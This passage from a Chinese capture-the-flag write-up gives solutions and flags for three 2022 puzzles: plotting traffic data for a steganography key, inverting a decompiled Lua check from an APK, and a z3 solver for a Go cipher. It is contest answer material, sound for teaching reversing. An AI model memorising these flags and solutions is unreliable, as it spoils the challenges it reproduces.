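    """Decode four hex digits as a 16-bit little-endian integer."""
    return int.from_bytes(bytes.fromhex(hex_digits), "little")


X = []
Y = []
for line in data:
    X.append(_le16(line[4:8]))
    # Negated so the drawing is not mirrored vertically in the plot.
    Y.append(-_le16(line[8:12]))

fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title("key")
ax1.scatter(X, Y, c='r', marker='o')
plt.show()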

提取带有压感的流量数据,画图得到

18cba496

作为key,使用silenteye解密


flag{42a12187c01a4a4f2b3f5ccd0a019656}

Mobile

andlua

apk反编译,找到res/raw路径下的lua 脚本

-- Decompiled check routine from the Lua script under res/raw in the APK.
-- NOTE(review): as decompiled, every input_byte[i] is assigned five constants in a row, so
-- only the last one survives, and the table is never compared with anything. Presumably
-- the decompiler lost the operation applied at each step; confirm against the bytecode.
-- The write-up's solver treats the five constants per index, in this order, as the operands
-- of add / subtract / xor steps.
function doEncrypt(tv,input)
   -- Copy the input string into a 0-based table of byte values.
   local input_byte = {}
   local input_len = string.len(input)
   for i = 1, input_len do
       input_byte[i-1] = string.byte(input, i, i)
   end
   -- "vm_start" and "vm_end" bracket the generated statement list; neither local is read.
   local a = "vm_start"
   input_byte[0] = 23
   input_byte[0] = 5
   input_byte[0] = 33
   input_byte[0] = 11
   input_byte[0] = 14
   input_byte[1] = 10
   input_byte[1] = 21
   input_byte[1] = 7
   input_byte[1] = 40
   input_byte[1] = 12
   input_byte[2] = 32
   input_byte[2] = 32
   input_byte[2] = 35
   input_byte[2] = 13
   input_byte[2] = 14
   input_byte[3] = 26
   input_byte[3] = 7
   input_byte[3] = 25
   input_byte[3] = 25
   input_byte[3] = 1
   input_byte[4] = 3
   input_byte[4] = 4
   input_byte[4] = 13
   input_byte[4] = 27
   input_byte[4] = 5
   input_byte[5] = 25
   input_byte[5] = 13
   input_byte[5] = 1
   input_byte[5] = 33
   input_byte[5] = 38
   input_byte[6] = 33
   input_byte[6] = 24
   input_byte[6] = 31
   input_byte[6] = 17
   input_byte[6] = 24
   input_byte[7] = 20
   input_byte[7] = 26
   input_byte[7] = 8
   input_byte[7] = 20
   input_byte[7] = 40
   input_byte[8] = 25
   input_byte[8] = 18
   input_byte[8] = 3
   input_byte[8] = 7
   input_byte[8] = 34
   input_byte[9] = 26
   input_byte[9] = 37
   input_byte[9] = 8
   input_byte[9] = 15
   input_byte[9] = 28
   input_byte[10] = 31
   input_byte[10] = 21
   input_byte[10] = 31
   input_byte[10] = 19
   input_byte[10] = 21
   input_byte[11] = 19
   input_byte[11] = 3
   input_byte[11] = 37
   input_byte[11] = 13
   input_byte[11] = 20
   input_byte[12] = 18
   input_byte[12] = 12
   input_byte[12] = 15
   input_byte[12] = 3
   input_byte[12] = 4
   input_byte[13] = 33
   input_byte[13] = 21
   input_byte[13] = 33
   input_byte[13] = 7
   input_byte[13] = 18
   input_byte[14] = 15
   input_byte[14] = 23
   input_byte[14] = 3
   input_byte[14] = 12
   input_byte[14] = 40
   input_byte[15] = 11
   input_byte[15] = 32
   input_byte[15] = 25
   input_byte[15] = 34
   input_byte[15] = 36
   input_byte[16] = 9
   input_byte[16] = 9
   input_byte[16] = 37
   input_byte[16] = 19
   input_byte[16] = 27
   input_byte[17] = 36
   input_byte[17] = 10
   input_byte[17] = 30
   input_byte[17] = 14
   input_byte[17] = 14
   input_byte[18] = 10
   input_byte[18] = 34
   input_byte[18] = 6
   input_byte[18] = 31
   input_byte[18] = 27
   input_byte[19] = 11
   input_byte[19] = 9
   input_byte[19] = 29
   input_byte[19] = 40
   input_byte[19] = 5
   input_byte[20] = 20
   input_byte[20] = 35
   input_byte[20] = 26
   input_byte[20] = 29
   input_byte[20] = 21
   input_byte[21] = 31
   input_byte[21] = 19
   input_byte[21] = 8
   input_byte[21] = 1
   input_byte[21] = 4
   input_byte[22] = 37
   input_byte[22] = 39
   input_byte[22] = 25
   input_byte[22] = 12
   input_byte[22] = 20
   input_byte[23] = 17
   input_byte[23] = 24
   input_byte[23] = 19
   input_byte[23] = 1
   input_byte[23] = 9
   input_byte[24] = 19
   input_byte[24] = 18
   input_byte[24] = 11
   input_byte[24] = 28
   input_byte[24] = 21
   input_byte[25] = 7
   input_byte[25] = 6
   input_byte[25] = 6
   input_byte[25] = 31
   input_byte[25] = 8
   input_byte[26] = 9
   input_byte[26] = 22
   input_byte[26] = 13
   input_byte[26] = 14
   input_byte[26] = 30
   input_byte[27] = 7
   input_byte[27] = 19
   input_byte[27] = 34
   input_byte[27] = 3
   input_byte[27] = 9
   input_byte[28] = 39
   input_byte[28] = 16
   input_byte[28] = 28
   input_byte[28] = 15
   input_byte[28] = 15
   input_byte[29] = 26
   input_byte[29] = 19
   input_byte[29] = 11
   input_byte[29] = 15
   input_byte[29] = 27
   input_byte[30] = 29
   input_byte[30] = 32
   input_byte[30] = 11
   input_byte[30] = 26
   input_byte[30] = 33
   input_byte[31] = 13
   input_byte[31] = 10
   input_byte[31] = 11
   input_byte[31] = 8
   input_byte[31] = 12
   input_byte[32] = 14
   input_byte[32] = 21
   input_byte[32] = 13
   input_byte[32] = 9
   input_byte[32] = 13
   input_byte[33] = 21
   input_byte[33] = 9
   input_byte[33] = 24
   input_byte[33] = 27
   input_byte[33] = 23
   input_byte[34] = 10
   input_byte[34] = 7
   input_byte[34] = 24
   input_byte[34] = 8
   input_byte[34] = 39
   input_byte[35] = 8
   input_byte[35] = 30
   input_byte[35] = 21
   input_byte[35] = 37
   input_byte[35] = 20
   input_byte[36] = 30
   input_byte[36] = 26
   input_byte[36] = 2
   input_byte[36] = 17
   input_byte[36] = 29
   input_byte[37] = 22
   input_byte[37] = 8
   input_byte[37] = 31
   input_byte[37] = 16
   input_byte[37] = 8
   local b = "vm_end"
   -- The only visible effect: the text view is set to the literal "vm_check".
   local c = "vm_check"
   tv:setText(c)
end


op_num = [23, 5, 33, 11, 14, 10, 21, 7, 40, 12, 32, 32, 35, 13, 14, 26, 7, 25, 25, 1, 3, 4, 13, 27, 5, 25, 13, 1, 33,
         38, 33, 24, 31, 17, 24, 20, 26, 8, 20, 40, 25, 18, 3, 7, 34, 26, 37, 8, 15, 28, 31, 21, 31, 19, 21, 19, 3, 37,
         13, 20, 18, 12, 15, 3, 4, 33, 21, 33, 7, 18, 15, 23, 3, 12, 40, 11, 32, 25, 34, 36, 9, 9, 37, 19, 27, 36, 10,
         30, 14, 14, 10, 34, 6, 31, 27, 11, 9, 29, 40, 5, 20, 35, 26, 29, 21, 31, 19, 8, 1, 4, 37, 39, 25, 12, 20, 17,
         24, 19, 1, 9, 19, 18, 11, 28, 21, 7, 6, 6, 31, 8, 9, 22, 13, 14, 30, 7, 19, 34, 3, 9, 39, 16, 28, 15, 15, 26,
         19, 11, 15, 27, 29, 32, 11, 26, 33, 13, 10, 11, 8, 12, 14, 21, 13, 9, 13, 21, 9, 24, 27, 23, 10, 7, 24, 8, 39,
         8, 30, 21, 37, 20, 30, 26, 2, 17, 29, 22, 8, 31, 16, 8]
cipher = [0x66, 0x00000080, 0x0000005D, 0x00000075, 0x00000095, 0x0000003D, 0x0000004B, 0x0000005B, 0x000000A0,
         0x0000000C, 0x0000002F, 0x0000006E, 0x0000005A, 0x00000081, 0x00000044, 0x00000053, 0x0000000E, 0x00000070,
         0x0000005E, 0x00000008, 0x00000014, 0x00000035, 0x00000020, 0x00000066, 0x0000009F, 0x00000033, 0x00000049,
         0x00000046, 0x0000006B, 0x0000004D, 0x0000002F, 0x0000005E, 0x00000062, 0x0000000F, 0x00000053, 0x00000067,
         0x0000005D, 0x00000084]

# Each cipher byte went through five recorded operations; undo them last-to-first.
# The operand's size selects the operation: above 19 xor, 10 to 19 subtract, 9 or less add.
for k, base in enumerate(range(0, len(op_num), 5)):
    for offset in (4, 3, 2, 1, 0):
        operand = op_num[base + offset]
        if operand > 19:
            cipher[k] ^= operand
        elif operand > 9:
            cipher[k] -= operand
        else:
            cipher[k] += operand

# Emit the recovered bytes as one string, without a trailing newline.
print(''.join(chr(value) for value in cipher), end='')

#flag{7dac6284cea9d861034f73df34861ae5}


Reverse

go2cry

输入按8字节一组进行加密,共计4组

part 1

简单单字节操作


循环结构如下

for i in range(0, 4, 3)

而后调用math_big___ptr_Int__SetInt64 转为int64

math_big_nat_setBytes转为big-endian

part 2

而后进入异或循环,v14为有符号数,每轮通过判断其符号位(即最高位)的正负来确定是否异或


part 3

最后进入位操作,看起来很复杂,实际上只是把各字节中同一位置的比特按位序拼接成新的字节(相当于对8×8的比特矩阵做转置)


化简运算之后

# Sample 8-byte group used to illustrate the simplified bit operation.
# ROL is the rotate-left helper defined in the full script further down.
revs = [0x4C, 0xB2, 0x06, 0xFE, 0x4C, 0xA8, 0xDE, 0x60]

# Every byte is first rotated left by 5 within 8 bits.
rotated = [ROL(value, 5, 8) for value in revs]

# Output byte k collects bit (7 - k) of each rotated byte, with the bit
# from byte m landing at position m counted from the most significant bit.
enc = [0] * 8
for k in range(8):
    for m, value in enumerate(rotated):
        if value >> (7 - k) & 1:
            enc[k] |= 0x80 >> m

print([bin(value)[2:].zfill(8) for value in rotated])
print([bin(value)[2:].zfill(8) for value in enc])

# ['10001001', '01010110', '11000000', '11011111', '10001001', '00010101', '11011011', '00001100']
# ['10111010', '01110010', '00000000', '01010110', '10011011', '01010101', '01010010', '10011110']

完整脚本如下


from z3 import *

def ROL(data, shift, size=32):
    """Rotate ``data`` left by ``shift`` bits within a ``size``-bit word.

    ``shift`` is reduced modulo ``size``. ``data`` is expected to fit in
    ``size`` bits; no masking is applied to wider values.
    """
    shift %= size
    # Bits that fall off the top of the word and wrap around to the bottom.
    wrapped = data >> (size - shift)
    # Shifted value with the overflowed bits subtracted back out.
    return ((data << shift) - (wrapped << size)) + wrapped

def ROR(data, shift, size=32):
    """Rotate ``data`` right by ``shift`` bits within a ``size``-bit word.

    ``shift`` is reduced modulo ``size``. ``data`` is expected to fit in
    ``size`` bits; no masking is applied to wider values.
    """
    shift %= size
    # Part of the word that stays in place after the right shift.
    kept = data >> shift
    # Low bits that wrap around to the top of the word.
    wrapped = (data << (size - shift)) - (kept << size)
    return kept + wrapped

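def solves(res):
    """Solve one 8-byte group of the cipher with z3 and print the plaintext.

    The three stages of the encryption are replayed on eight symbolic
    bytes, the result is constrained to match ``res``, and the model found
    by the solver is printed as a ``bytearray``.

    Args:
        res: the eight ciphertext bytes (Python ints) of one group.

    Raises:
        AssertionError: if the solver does not report ``sat``.
    """
    sol = Solver()
    raw = [BitVec(f"flag[{i}]", 8) for i in range(8)]
    inp = raw.copy()

    # Part 1: byte-wise XOR mixing on the triples starting at index 0 and 3.
    for i in range(0, 4, 3):
        v20 = inp[i] ^ inp[i + 2]
        inp[i] = v20

        v19 = v20 ^ inp[i + 2] ^ inp[i + 1]
        inp[i + 1] = v19
        inp[i + 2] ^= v19

    # Join the eight bytes into one 64-bit vector; inp[0] is the top byte.
    v14 = Concat(*inp)

    # Part 2: 64 rounds of "shift left by one, XOR the constant when the
    # top bit was set before the shift".
    for _ in range(64):
        v14 = (v14 * 2) ^ (((v14 >> 63) & 1) * 0x2EF20D07161E85F7)

    # Split the 64-bit state back into bytes, least significant byte first.
    inp3 = [Extract(8 * n + 7, 8 * n, v14) for n in range(8)]

    # Part 3, inverted on the concrete ciphertext: byte i collects bit
    # (7 - i) of every ciphertext byte (MSB first), then is rotated right
    # by 5 within 8 bits.
    temp = [0] * 8
    for i in range(8):
        ch = 0
        for j in range(8):
            ch <<= 1
            ch += res[j] >> (7 - i) & 1
        temp[i] = ROR(ch, 5, 8)

    for i in range(8):
        sol.add(inp3[i] == temp[i])

    # Run the solver outside of an `assert`: under `python -O` assert
    # statements are stripped, which would skip check() and leave no model.
    status = sol.check()
    if status != sat:
        raise AssertionError(f"no solution for ciphertext group {res!r}: {status}")

    mol = sol.model()
    print(bytearray([mol.eval(i).as_long() for i in raw]))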

# Expected ciphertext: 32 bytes, handled as four independent 8-byte groups.
cmpdata = [
    0xC8, 0x34, 0x59, 0x4E, 0xC0, 0xD5, 0xAD, 0x08,
    0xC9, 0x2B, 0x4C, 0xDA, 0xE6, 0xC0, 0x9A, 0x19,
    0xB5, 0x10, 0x55, 0x7D, 0xE8, 0xF5, 0x83, 0xFF,
    0x74, 0x8B, 0xE3, 0xD4, 0x6A, 0x7D, 0x44, 0x58,
]

# Solve each group on its own; solves() prints the recovered bytes.
for start in range(0, len(cmpdata), 8):
    group = cmpdata[start:start + 8]
    solves(group)



原文始发于微信公众号(7coinSec):【7coin】2022宁波市赛WriteUp
